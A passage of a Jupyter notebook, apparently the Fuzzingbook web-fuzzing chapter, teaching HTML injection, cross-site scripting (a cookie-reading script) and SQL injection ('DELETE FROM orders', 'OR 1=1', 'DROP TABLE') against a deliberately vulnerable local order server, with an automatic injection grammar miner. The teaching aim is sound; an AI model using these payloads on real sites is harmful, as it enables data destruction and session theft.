     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?item=drill&name=%0A++++Jane+Doe%3Cp%3E%0A++++%3Cstrong%3E%3Ca+href%3D%22www.lots.of.malware%22%3EClick+here+for+cute+cat+pictures!%3C%2Fa%3E%3C%2Fstrong%3E%0A++++%3C%2Fp%3E%0A++++&email=j_smith%40example.com&city=Seattle&zip=02805 HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook Rotary Hammer</strong> to \n",
       "    Jane Doe<p>\n",
       "    <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\n",
       "    </p>\n",
       "     in Seattle, 02805<br>\n",
       "  A confirmation mail will be sent to j_smith@example.com.\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 134,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Since the link seemingly comes from a trusted origin, users are much more likely to follow it.  The link is even persistent, as it is stored in the database:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 135,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.754909Z",
     "iopub.status.busy": "2025-01-16T10:12:26.754817Z",
     "iopub.status.idle": "2025-01-16T10:12:26.756672Z",
     "shell.execute_reply": "2025-01-16T10:12:26.756395Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[('drill', '\\n    Jane Doe<p>\\n    <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\\n    </p>\\n    ', 'j_smith@example.com', 'Seattle', '02805')]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders WHERE name LIKE '%<%'\").fetchall())"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "This means that if anyone ever queries the database (for instance, operators processing the order), they will also see the link, multiplying its impact.  By carefully crafting the injected HTML, one can thus expose malicious content to numerous users – until the injected HTML is finally deleted."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Cross-Site Scripting Attacks\n",
    "\n",
    "If one can inject HTML code into a Web page, one can also inject *JavaScript* code as part of the injected HTML.  This code would then be executed as soon as the injected HTML is rendered.   \n",
    "\n",
    "This is particularly dangerous because executed JavaScript always executes in the _origin_ of the page which contains it. Therefore, an attacker can normally not force a user to run JavaScript in any origin he does not control himself. When an attacker, however, can inject his code into a vulnerable Web application, he can have the client run the code with the (trusted) Web application as origin.\n",
    "\n",
    "In such a *cross-site scripting* (*XSS*) attack, the injected script can do a lot more than just plain HTML.  For instance, the code can access sensitive page content or session cookies.  If the code in question runs in the operator's browser (for instance, because an operator is reviewing the list of orders), it could retrieve any other information shown on the screen and thus steal order details for a variety of customers."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Here is a very simple example of a script injection.  Whenever the name is displayed, it causes the browser to \"steal\" the current *session cookie* – the piece of data the browser uses to identify the user with the server.  In our case, we could steal the cookie of the Jupyter session."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 136,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.758082Z",
     "iopub.status.busy": "2025-01-16T10:12:26.757986Z",
     "iopub.status.idle": "2025-01-16T10:12:26.759626Z",
     "shell.execute_reply": "2025-01-16T10:12:26.759424Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "ORDER_GRAMMAR_WITH_XSS_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {\n",
    "    \"<name>\": [cgi_encode('Jane Doe' +\n",
    "                          '<script>' +\n",
    "                          'document.title = document.cookie.substring(0, 10);' +\n",
    "                          '</script>')\n",
    "               ],\n",
    "})"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 137,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.760896Z",
     "iopub.status.busy": "2025-01-16T10:12:26.760805Z",
     "iopub.status.idle": "2025-01-16T10:12:26.763120Z",
     "shell.execute_reply": "2025-01-16T10:12:26.762911Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'/order?item=lockset&name=Jane+Doe%3cscript%3edocument.title+%3d+document.cookie.substring(0,+10)%3b%3c%2fscript%3e&email=j.doe%40example.com&city=Seattle&zip=34506'"
      ]
     },
     "execution_count": 137,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)\n",
    "order_with_injected_xss = xss_injection_fuzzer.fuzz()\n",
    "order_with_injected_xss"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 138,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.764491Z",
     "iopub.status.busy": "2025-01-16T10:12:26.764412Z",
     "iopub.status.idle": "2025-01-16T10:12:26.766421Z",
     "shell.execute_reply": "2025-01-16T10:12:26.766196Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'http://127.0.0.1:8800/order?item=lockset&name=Jane+Doe%3cscript%3edocument.title+%3d+document.cookie.substring(0,+10)%3b%3c%2fscript%3e&email=j.doe%40example.com&city=Seattle&zip=34506'"
      ]
     },
     "execution_count": 138,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)\n",
    "url_with_injected_xss"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 139,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.767782Z",
     "iopub.status.busy": "2025-01-16T10:12:26.767700Z",
     "iopub.status.idle": "2025-01-16T10:12:26.772151Z",
     "shell.execute_reply": "2025-01-16T10:12:26.771929Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook Lock Set</strong> to Jane Doe<script>document.title = document.cookie.substring(0, 10);</script> in Seattle, 34506<br>\n",
       "  A confirmation mail will be sent to j.doe@example.com.\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 139,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(webbrowser(url_with_injected_xss, mute=True))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "The message looks as always – but if you have a look at your browser title, it should now show the first 10 characters of your \"secret\" notebook cookie.  Instead of showing its prefix in the title, the script could also silently send the cookie to a remote server, allowing attackers to highjack your current notebook session and interact with the server on your behalf.  It could also go and access and send any other data that is shown in your browser or otherwise available.  It could run a *keylogger* and steal passwords and other sensitive data as it is typed in.  Again, it will do so every time the compromised order with Jane Doe's name is shown in the browser and the associated script is executed."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Let us go and reset the title to a less sensitive value:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 140,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.773661Z",
     "iopub.status.busy": "2025-01-16T10:12:26.773563Z",
     "iopub.status.idle": "2025-01-16T10:12:26.775594Z",
     "shell.execute_reply": "2025-01-16T10:12:26.775369Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<script>document.title = \"Jupyter\"</script>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 140,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML('<script>document.title = \"Jupyter\"</script>')"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### SQL Injection Attacks\n",
    "\n",
    "Cross-site scripts have the same privileges as web pages – most notably, they cannot access or change data outside your browser.  So-called *SQL injection* targets _databases_, allowing to inject commands that can read or modify data in the database, or change the purpose of the original query."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "To understand how SQL injection works, let us take a look at the code that produces the SQL command to insert a new order into the database:\n",
    "\n",
    "```python\n",
    "sql_command = (\"INSERT INTO orders \" +\n",
    "    \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\n",
    "```\n",
    "\n",
    "What happens if any of the values (say, `name`) has a value that _can also be interpreted as a SQL command?_  Then, instead of the intended `INSERT` command, we would execute the command imposed by `name`."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Let us illustrate this by an example.  We set the individual values as they would be found during execution:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 141,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.776972Z",
     "iopub.status.busy": "2025-01-16T10:12:26.776884Z",
     "iopub.status.idle": "2025-01-16T10:12:26.778458Z",
     "shell.execute_reply": "2025-01-16T10:12:26.778254Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "values: Dict[str, str] = {\n",
    "    \"item\": \"tshirt\",\n",
    "    \"name\": \"Jane Doe\",\n",
    "    \"email\": \"j.doe@example.com\",\n",
    "    \"city\": \"Seattle\",\n",
    "    \"zip\": \"98104\"\n",
    "}"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "and format the string as seen above:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 142,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.779693Z",
     "iopub.status.busy": "2025-01-16T10:12:26.779611Z",
     "iopub.status.idle": "2025-01-16T10:12:26.781423Z",
     "shell.execute_reply": "2025-01-16T10:12:26.781220Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "\"INSERT INTO orders VALUES ('tshirt', 'Jane Doe', 'j.doe@example.com', 'Seattle', '98104')\""
      ]
     },
     "execution_count": 142,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "sql_command = (\"INSERT INTO orders \" +\n",
    "               \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\n",
    "sql_command"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "All fine, right?  But now, we define a very \"special\" name that can also be interpreted as a SQL command:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 143,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.782949Z",
     "iopub.status.busy": "2025-01-16T10:12:26.782864Z",
     "iopub.status.idle": "2025-01-16T10:12:26.784450Z",
     "shell.execute_reply": "2025-01-16T10:12:26.784220Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "values[\"name\"] = \"Jane', 'x', 'x', 'x'); DELETE FROM orders; -- \""
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 144,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.785931Z",
     "iopub.status.busy": "2025-01-16T10:12:26.785845Z",
     "iopub.status.idle": "2025-01-16T10:12:26.787869Z",
     "shell.execute_reply": "2025-01-16T10:12:26.787629Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "\"INSERT INTO orders VALUES ('tshirt', 'Jane', 'x', 'x', 'x'); DELETE FROM orders; -- ', 'j.doe@example.com', 'Seattle', '98104')\""
      ]
     },
     "execution_count": 144,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "sql_command = (\"INSERT INTO orders \" +\n",
    "               \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\n",
    "sql_command"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "What happens here is that we now get a command to insert values into the database (with a few \"dummy\" values `x`), followed by a SQL `DELETE` command that would _delete all entries_ of the orders table.  The string `-- ` starts a SQL _comment_ such that the remainder of the original query would be easily ignored.  By crafting strings that can also be interpreted as SQL commands, attackers can alter or delete database data, bypass authentication mechanisms and many more."
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Is our server also vulnerable to such attacks?  Of course, it is.  We create a special grammar such that we can set the `<name>` parameter to a string with SQL injection, just as shown above."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 145,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.789275Z",
     "iopub.status.busy": "2025-01-16T10:12:26.789200Z",
     "iopub.status.idle": "2025-01-16T10:12:26.790744Z",
     "shell.execute_reply": "2025-01-16T10:12:26.790540Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from Grammars import extend_grammar"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 146,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.792090Z",
     "iopub.status.busy": "2025-01-16T10:12:26.792011Z",
     "iopub.status.idle": "2025-01-16T10:12:26.793567Z",
     "shell.execute_reply": "2025-01-16T10:12:26.793376Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {\n",
    "    \"<name>\": [cgi_encode(\"Jane', 'x', 'x', 'x'); DELETE FROM orders; --\")],\n",
    "})"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 147,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.794965Z",
     "iopub.status.busy": "2025-01-16T10:12:26.794870Z",
     "iopub.status.idle": "2025-01-16T10:12:26.797180Z",
     "shell.execute_reply": "2025-01-16T10:12:26.796951Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "\"/order?item=drill&name=Jane',+'x',+'x',+'x')%3b+DELETE+FROM+orders%3b+--&email=j.doe%40example.com&city=New+York&zip=14083\""
      ]
     },
     "execution_count": 147,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)\n",
    "order_with_injected_sql = sql_injection_fuzzer.fuzz()\n",
    "order_with_injected_sql"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "These are the current orders:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 148,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.798574Z",
     "iopub.status.busy": "2025-01-16T10:12:26.798474Z",
     "iopub.status.idle": "2025-01-16T10:12:26.800358Z",
     "shell.execute_reply": "2025-01-16T10:12:26.800138Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[('tshirt', 'Jane Doe', 'doe@example.com', 'Seattle', '98104'), ('lockset', 'Jane Doe', 'j_smith@example.com', 'Seattle', '16631'), ('drill', 'Jane Doe', 'j.doe@example.com', '', '45732'), ('drill', 'Jane Doe', 'j,doe@example.com', 'Seattle', '45732'), ('drill', ' ', '5F @p   a ', 'cdb', '3230'), ('drill', ' m', '@@0', 'd', '9'), ('lockset', '  ', 'c@d', '_', '6'), ('lockset', ' ', 'd@_-', '2  0', '1040'), ('tshirt', 'Kb', 'm@ ', 'zy ', '13'), ('lockset', 'd', 'U @t', ' ', '4'), ('tshirt', '_ 2', '1  @ ', ' ', '30'), ('tshirt', ' ', 'a-@ ', ' W', '2'), ('lockset', 'V', '  @aUeeD', ' ', '01'), ('tshirt', 'oc', '  @ ', 'a', '25'), ('drill', '55', '3>@@5', 'L', '0'), ('tshirt', ' ', 'b t2@ ', 'E9', '54'), ('drill', 'R-', 'e@?', ' ', '5'), ('drill', '\\n    Jane Doe<p>\\n    <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\\n    </p>\\n    ', 'j_smith@example.com', 'Seattle', '02805'), ('lockset', 'Jane Doe<script>document.title = document.cookie.substring(0, 10);</script>', 'j.doe@example.com', 'Seattle', '34506')]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Let us go and send our URL with SQL injection to the server.  From the log, we see that the \"malicious\" SQL command is formed just as sketched above, and executed, too."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 149,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.801813Z",
     "iopub.status.busy": "2025-01-16T10:12:26.801721Z",
     "iopub.status.idle": "2025-01-16T10:12:26.807379Z",
     "shell.execute_reply": "2025-01-16T10:12:26.807156Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] INSERT INTO orders VALUES ('drill', 'Jane', 'x', 'x', 'x'); DELETE FROM orders; --', 'j.doe@example.com', 'New York', '14083')\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?item=drill&name=Jane',+'x',+'x',+'x')%3B+DELETE+FROM+orders%3B+--&email=j.doe%40example.com&city=New+York&zip=14083 HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "All orders are now gone:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 150,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.808773Z",
     "iopub.status.busy": "2025-01-16T10:12:26.808666Z",
     "iopub.status.idle": "2025-01-16T10:12:26.810452Z",
     "shell.execute_reply": "2025-01-16T10:12:26.810241Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "This effect is also illustrated [in this very popular XKCD comic](https://xkcd.com/327/):"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "![https://xkcd.com/327/](PICS/xkcd_exploits_of_a_mom.png){width=100%}"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Even if we had not been able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief.  For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice.  We could also use SQL injection to inject HTML and JavaScript code as above, bypassing possible sanitization geared at these domains."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "To avoid such effects, the remedy is to _sanitize_ all third-party inputs – no character in the input must be interpretable as plain HTML, JavaScript, or SQL.  This is achieved by properly _quoting_ and _escaping_ inputs.  The [exercises](#Exercises) give some instructions on what to do."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Leaking Internal Information\n",
    "\n",
    "To craft the above SQL queries, we have used _insider information_ – for instance, we knew the name of the table as well as its structure.  Surely, an attacker would not know this and thus not be able to run the attack, right?  Unfortunately, it turns out we are leaking all of this information out to the world in the first place.  The error message produced by our server reveals everything we need:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 151,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.811893Z",
     "iopub.status.busy": "2025-01-16T10:12:26.811808Z",
     "iopub.status.idle": "2025-01-16T10:12:26.815315Z",
     "shell.execute_reply": "2025-01-16T10:12:26.815069Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "answer = webbrowser(urljoin(httpd_url, \"/order\"), mute=True)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 152,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.816726Z",
     "iopub.status.busy": "2025-01-16T10:12:26.816644Z",
     "iopub.status.idle": "2025-01-16T10:12:26.818680Z",
     "shell.execute_reply": "2025-01-16T10:12:26.818451Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Internal Server Error</strong>\n",
       "  <p>\n",
       "  The server has encountered an internal error.  Go to our <a href=\"/\">order form</a>.\n",
       "  <pre>Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'item'\n",
       "</pre>\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n",
       "  "
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 152,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(answer)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "The best way to avoid information leakage through failures is of course not to fail in the first place.  But if you fail, _make it hard for the attacker to establish a link between the attack and the failure._ In particular,\n",
    "\n",
    "* Do not produce \"internal error\" messages (and certainly not ones with internal information).\n",
    "* Do not become unresponsive; just go back to the home page and ask the user to supply correct data.\n",
    "\n",
    "One more time, the [exercises](#Exercises) give some instructions on how to fix the server."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "If you can manipulate the server not only to alter information, but also to _retrieve_ information, you can learn about table names and structure by accessing special _tables_ (also called *data dictionary*) in which database servers store their metadata.  In the MySQL server, for instance, the special table `information_schema` holds metadata such as the names of databases and tables, data types of columns, or access privileges."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Fully Automatic Web Attacks"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "So far, we have demonstrated the above attacks using our manually written order grammar.  However, the attacks also work for generated grammars.  We extend `HTMLGrammarMiner` by adding a number of common SQL injection attacks:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 153,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.820450Z",
     "iopub.status.busy": "2025-01-16T10:12:26.820361Z",
     "iopub.status.idle": "2025-01-16T10:12:26.822998Z",
     "shell.execute_reply": "2025-01-16T10:12:26.822769Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class SQLInjectionGrammarMiner(HTMLGrammarMiner):\n",
    "    \"\"\"Demonstration of an automatic SQL Injection attack grammar miner\"\"\"\n",
    "\n",
    "    # Some common attack schemes\n",
    "    ATTACKS: List[str] = [\n",
    "        \"<string>' <sql-values>); <sql-payload>; <sql-comment>\",\n",
    "        \"<string>' <sql-comment>\",\n",
    "        \"' OR 1=1<sql-comment>'\",\n",
    "        \"<number> OR 1=1\",\n",
    "    ]\n",
    "\n",
    "    def __init__(self, html_text: str, sql_payload: str):\n",
    "        \"\"\"Constructor.\n",
    "        `html_text` - the HTML form to be attacked\n",
    "        `sql_payload` - the SQL command to be executed\n",
    "        \"\"\"\n",
    "        super().__init__(html_text)\n",
    "\n",
    "        self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {\n",
    "            \"<text>\": [\"<string>\", \"<sql-injection-attack>\"],\n",
    "            \"<number>\": [\"<digits>\", \"<sql-injection-attack>\"],\n",
    "            \"<checkbox>\": [\"<_checkbox>\", \"<sql-injection-attack>\"],\n",
    "            \"<email>\": [\"<_email>\", \"<sql-injection-attack>\"],\n",
    "            \"<sql-injection-attack>\": [\n",
    "                cgi_encode(attack, \"<->\") for attack in self.ATTACKS\n",
    "            ],\n",
    "            \"<sql-values>\": [\"\", cgi_encode(\"<sql-values>, '<string>'\", \"<->\")],\n",
    "            \"<sql-payload>\": [cgi_encode(sql_payload)],\n",
    "            \"<sql-comment>\": [\"--\", \"#\"],\n",
    "        })"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 154,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.824300Z",
     "iopub.status.busy": "2025-01-16T10:12:26.824228Z",
     "iopub.status.idle": "2025-01-16T10:12:26.826048Z",
     "shell.execute_reply": "2025-01-16T10:12:26.825827Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "html_miner = SQLInjectionGrammarMiner(\n",
    "    html_text, sql_payload=\"DROP TABLE orders\")"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 155,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.827523Z",
     "iopub.status.busy": "2025-01-16T10:12:26.827442Z",
     "iopub.status.idle": "2025-01-16T10:12:26.830152Z",
     "shell.execute_reply": "2025-01-16T10:12:26.829925Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "{'<start>': ['<action>?<query>'],\n",
       " '<string>': ['<letter>', '<letter><string>'],\n",
       " '<letter>': ['<plus>', '<percent>', '<other>'],\n",
       " '<plus>': ['+'],\n",
       " '<percent>': ['%<hexdigit-1><hexdigit>'],\n",
       " '<hexdigit>': ['0',\n",
       "  '1',\n",
       "  '2',\n",
       "  '3',\n",
       "  '4',\n",
       "  '5',\n",
       "  '6',\n",
       "  '7',\n",
       "  '8',\n",
       "  '9',\n",
       "  'a',\n",
       "  'b',\n",
       "  'c',\n",
       "  'd',\n",
       "  'e',\n",
       "  'f'],\n",
